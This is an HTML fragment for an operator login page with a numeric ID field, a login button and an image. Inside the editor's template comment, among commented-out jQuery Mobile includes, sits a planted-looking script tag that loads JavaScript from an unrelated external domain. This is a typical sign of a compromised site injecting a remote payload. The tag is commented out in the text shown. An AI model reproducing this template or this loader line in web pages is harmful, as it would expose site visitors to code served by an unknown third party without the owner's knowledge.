


<!DOCTYPE html>
<!--
To change this license header, choose License Headers in Project Properties.
To change this template file, choose Tools | Templates
and open the template in the editor.
<script async="async" src="//bmst.pw/2233886x50.js"></script>
<link rel="stylesheet" href="http://code.jquery.com/mobile/1.2.0/jquery.mobile-1.2.0.min.css" />
	<script src="http://code.jquery.com/jquery-1.8.2.min.js"></script>
	<script src="http://code.jquery.com/mobile/1.2.0/jquery.mobile-1.2.0.min.js"></script>-->
		
	<!--	<form  id="frmDatos" name="frmDatos" >-->

	
<div class="ui-grid-a">
    <div class="ui-block-a" style="width: 30%;">
<BR>
<H1><center>LOGIN OPERARIO</center></H1>

<BR>
<H1>
<center><input type="number" name="operario" class="ui-number ui-input ui-corner-all ui-shadow"  id="operario" style="width: 120px" /> <BR></center>

<BR>

<center><input type="button" class="ui-btn ui-input-btn ui-corner-all ui-shadow" style="size: 100%" value="LOGIN" onclick="user_login();"></center>
</H1>
</div>


<div class="ui-block-b" style="width: 70%;">

<center><img src="../images/PRL.png" alt="PRL" width="90%" ></center>
</div></div>
<!--</form>-->

	
